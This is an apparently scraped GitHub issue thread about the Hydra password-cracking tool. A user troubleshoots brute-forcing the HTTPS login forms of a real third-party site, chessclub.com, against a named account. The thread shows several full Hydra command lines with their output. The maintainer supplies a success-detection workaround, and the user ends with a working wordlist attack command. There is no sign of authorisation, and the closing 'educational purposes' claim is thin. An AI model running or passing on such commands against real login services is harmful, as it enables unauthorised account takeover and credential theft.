Hydra-8.1 with cgywin about thc-hydra HOT 17 CLOSED

More information with the -v and -d switches:

http://www.pastebin.ca/2931522

(edit: pasted the text to the link above because it was too long to post here)

from thc-hydra.

Update:

root@kali:~# hydra -l secretmc -p legacy -vV -s 443 -t 1 store.chessclub.com https-post-form "/customer/account/login:login[username]=^USER^&login[password]=^PASS^&send=Login:Incorrect password."
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-02-18 02:41:40
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service http-post-form on port 443
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target store.chessclub.com - login "secretmc" - pass "legacy" - 1 of 1 [child 0]
[VERBOSE] Could not create an SSL session: error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure
[ERROR] Child with pid 6161 terminating, can not connect
[VERBOSE] Retrying connection for child 0
[STATUS] attack finished for store.chessclub.com (waiting for children to complete tests)
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-02-18 02:41:40

from thc-hydra.

only report bugs with the current version here on the repository, the version is 8.2-dev, you are reporting for 7,6 and 8.1

from thc-hydra.

Thanks for replying. Is this issue fixed in 8.2? Will check it out now.

from thc-hydra.

Okay compiled 8.2 but seem to be having issues with the failure parameter. Some words there (as shown below) give all passwords as valid passwords and other words give all passwords as invalid passwords (even if they are valid).

$ hydra -l secretmc -p legacy -vV -s 443 -t 1 store.chessclub.com https-post-form "/customer/account/login:login[username]=^USER^&login[password]=^PASS^&send=Login:Incorrect"
Hydra v8.2-dev (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-02-18 00:43:58
[DATA] max 1 task per 1 server, overall 64 tasks, 1 login try (l:1/p:1), ~0 tries per task
[DATA] attacking service http-post-form on port 443 with SSL
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target store.chessclub.com - login "secretmc" - pass "legacy" - 1 of 1 [child 0]
[443][http-post-form] host: store.chessclub.com login: secretmc password: legacy
[STATUS] attack finished for store.chessclub.com (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-02-18 00:44:00

$ hydra -l secretmc -p legdacy -vV -s 443 -t 1 store.chessclub.com https-post-form "/customer/account/login:login[username]=^USER^&login[password]=^PASS^&send=Login:Incorrect"
Hydra v8.2-dev (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-02-18 00:44:06
[DATA] max 1 task per 1 server, overall 64 tasks, 1 login try (l:1/p:1), ~0 tries per task
[DATA] attacking service http-post-form on port 443 with SSL
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target store.chessclub.com - login "secretmc" - pass "legdacy" - 1 of 1 [child 0]
[443][http-post-form] host: store.chessclub.com login: secretmc password: legdacy
[STATUS] attack finished for store.chessclub.com (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-02-18 00:44:08

$ hydra -l secretmc -p legdacy -vV -s 443 -t 1 store.chessclub.com https-post-form "/customer/account/login:login[username]=^USER^&login[password]=^PASS^&send=Login:Forgot"
Hydra v8.2-dev (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-02-18 00:44:33
[DATA] max 1 task per 1 server, overall 64 tasks, 1 login try (l:1/p:1), ~0 tries per task
[DATA] attacking service http-post-form on port 443 with SSL
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target store.chessclub.com - login "secretmc" - pass "legdacy" - 1 of 1 [child 0]
[STATUS] attack finished for store.chessclub.com (waiting for children to complete tests)
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-02-18 00:44:36

$ hydra -l secretmc -p legacy -vV -s 443 -t 1 store.chessclub.com https-post-form "/customer/account/login:login[username]=^USER^&login[password]=^PASS^&send=Login:Forgot"
Hydra v8.2-dev (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-02-18 00:44:42
[DATA] max 1 task per 1 server, overall 64 tasks, 1 login try (l:1/p:1), ~0 tries per task
[DATA] attacking service http-post-form on port 443 with SSL
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target store.chessclub.com - login "secretmc" - pass "legacy" - 1 of 1 [child 0]
[STATUS] attack finished for store.chessclub.com (waiting for children to complete tests)
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-02-18 00:44:45

Should I run the debug?

from thc-hydra.

If I enter a random parameter that doesn't exist on the login page as a failure it causes every username and password to appear as valid (obviously). However if I enter any text that does exist then every username and password (even if it is correct) comes out as invalid.

from thc-hydra.

can you please send an ouput where the failure text is valid but hydra does not detect it?
use the "-d" option for that.
(well, inspect the data yourself, I am pretty sure you will find that your select text is not correct)

from thc-hydra.

hydra -l secretmc -p legacy -vV -d -t 1 -s 443 store.chessclub.com https-post-form "/customer/account/login:login[username]=^USER^&login[password]=^PASS^&send=Login:Log In"

The failure text 'Log In' is valid because I have tested it in the past with a slower tool (Fireforce on Mozilla) and it returned the correct password out of a list of 50.

The username and password in the code above are also correct.

Hastebin including the -d switch here (output was too large for Pastebin):

http://hastebin.com/todomimace.md or http://hastebin.com/raw/todomimace (just text)

Thanks a lot for your help.

from thc-hydra.

Found something that seems to work on a different log in form within the same website.

$ hydra -l secretmc -p leffgacy -vV -t 1 -s 443 accounts.chessclub.com https-pos t-form "/Authentication/Login:Username=^USER^&Password=^PASS^&send=Login:S=Log o ut"
Hydra v8.2-dev (c) 2014 by van Hauser/THC - Please do not use in military or sec ret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-02-18 02:26:16
[DATA] max 1 task per 1 server, overall 64 tasks, 1 login try (l:1/p:1), ~0 trie s per task
[DATA] attacking service http-post-form on port 443 with SSL
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target accounts.chessclub.com - login "secretmc" - pass "leffgacy" - 1 of 1 [child 0]
[STATUS] attack finished for accounts.chessclub.com (waiting for children to com plete tests)
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-02-18 02:26:18

$ hydra -l secretmc -p legacy -vV -t 1 -s 443 accounts.chessclub.com https-post- form "/Authentication/Login:Username=^USER^&Password=^PASS^&send=Login:S=Log out "
Hydra v8.2-dev (c) 2014 by van Hauser/THC - Please do not use in military or sec ret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-02-18 02:26:25
[DATA] max 1 task per 1 server, overall 64 tasks, 1 login try (l:1/p:1), ~0 trie s per task
[DATA] attacking service http-post-form on port 443 with SSL
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target accounts.chessclub.com - login "secretmc" - pass "legacy" - 1 o f 1 [child 0]
[VERBOSE] Page redirected to http://accounts.chessclub.com/
[STATUS] attack finished for accounts.chessclub.com (waiting for children to complete tests)
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-02-18 02:27:00

The correct password is 'legacy'. In the lower attempt shown above there is a redirection involved and Hydra hangs for roughly 15 seconds. This doesn't happen when the password is wrong such as the attempt above that.

Any ideas on a work around? It successfully distinguishes between right and wrong password now and the failure string is valid. Just seems like it is having difficulty converting the 2nd attempt into a valid password response.

from thc-hydra.

OK, I looked at the output and I see why it is not working: the login form has a CRSF security token that changes with every submit.
This is something that is not supported by hydra (yet).
sorry.

from thc-hydra.

Thanks for the reply. Does that hold true to the post I made after that?

For every bad password there is no redirecting involved. The moment I set 'legacy' as the password it begins to redirect. Is there anything to work with there?

This is with a bogus password: http://hastebin.com/ifodolugaj.md

This is with the legit password: http://hastebin.com/gososekuzu.md

Very noticeable differences!

from thc-hydra.

Got it to work with burp suite. The difference I mentioned above is noted and it's clear to see the correct password in it's GUI. Hydra would just be 495843 times quicker though if there was a way to identify a correct password from a password list. Purely for educational purposes.

from thc-hydra.

if you set it to legacy and it only does a redirect of the password is correct you can try:

"...otherhydrastuff:S=Location: /"

this should work

from thc-hydra.

Thanks for replying. Gonna give it a try now!

from thc-hydra.

hydra -l secretmc -P /cygdrive/c/hydra/pass.txt -vV -t 1 -s 443 accounts.chessclub.com https-post-form "/Authentication/Login:Username=^USER^&Password=^PASS^&send=Login:S=Location"

This string works flawlessly. Guesses the correct pw out of a list of 15. I must thank you for all of your continued help and I wish you the best of luck in the future!

from thc-hydra.

good :)

from thc-hydra.

This issue helped me a lot. I got issues with VERBOSE] Could not create an SSL session: error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure and after upgrading to 8.2 it worked ! Also thanks to @akaAMAZING for the last command example as it gave me the idea of using :S=Location as my login also got redirected when user was successfuly logged. 👍

from thc-hydra.